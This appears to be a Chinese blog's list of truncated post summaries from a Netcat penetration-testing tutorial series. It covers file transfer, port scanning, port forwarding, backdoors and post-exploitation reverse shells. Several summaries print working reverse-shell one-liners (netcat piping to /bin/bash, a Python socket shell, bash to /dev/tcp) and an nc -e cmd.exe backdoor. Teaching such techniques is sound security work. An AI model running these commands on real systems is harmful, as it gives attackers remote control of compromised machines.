摘要:
1 Netcat基本使用 2 Netcat文件传输 3 netcat信息探测 4 Netcat建立后门 5 netcat命令参数介绍 6 netcat连接转发 7 Netcat 反弹shell 8 Netcat 反弹shell(Python) 9 Netcat 反弹shell(不支持Nc -e) 阅读全文
摘要:
应用场景某些拿到服务器权限之后,想要设置一个反弹shell。当时因为配置原因不支持-e参数基础介绍反弹shell命令: nc ip port | /bin/bash | nc ip portPC接收Netcat命令: nc -lvnp port 需要启动两个监听端口命令解释介绍在攻击测试机器上开启两个NC进行监听端,其中一个作为输入,一个作为输出。目标机器上 使用管道来重新定向输入和输出。 阅读全文
摘要:
应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。但是安装了Python。基础介绍反弹shell命令: python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.... 阅读全文
摘要:
应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。反弹shell命令: bash -i >& /dev/tcp/ip/port 0>&1PC接收Netcat命令: nc -lvp port命令解释介绍bash -i >& /dev/tcp/ip/port 0>&1在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ,如果... 阅读全文
摘要:
连接转发为什么需要连接转发?突破某些特殊情况下的连接限制,以及处理一些特殊情况。- echo nc [target] [port] > delay.bat- nc -l -p [localport] -e delay.bat当有客户端连接该服务端时,连接的客户端和通过服务端连接到 target port上 实现了连接转发功能。(端口转发)内网机器跳板机器端口转发目标机器通话 阅读全文
摘要:
命令参数 [root@bzhl ~]# nc -hNcat 7.50 ( https://nmap.org/ncat )Usage: ncat [options] [hostname] [port]Options taking a time assume seconds. Append 'ms' for milliseconds,'s' for seconds, 'm' for minutes, ... 阅读全文
摘要:
使用场景1、获取目标的命令执行权限当目标机器上存在netcat之后,可以使用netcat建立后门,来实现执行目标命令的功能。为什么可以使用netcat建立后门,并返回操作结果?原理:netcat一切数据时通过标准输入/输出流实现的,所以可以利用netcat的命令行进行后门建立,并传输结果信息。window建立后门使用方法监听型后门:- nc -l -p 4444 -e cmd.exe 连接型后门-... 阅读全文
摘要:
使用场景1、目标内网的扫描当获得目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时刚好具有一个netcat的话,就可以使用netcat进行内网ip和端口的扫描。2、单纯对某个目标进行端口探测当手头没有任何探测工具可以使用netcat进行端口探测。3、对目标的服务banner进行抓取通过netcat对目标端口进行探测。端口扫描使用方法使用命令行:nc -v -n -z -w1 [targ... 阅读全文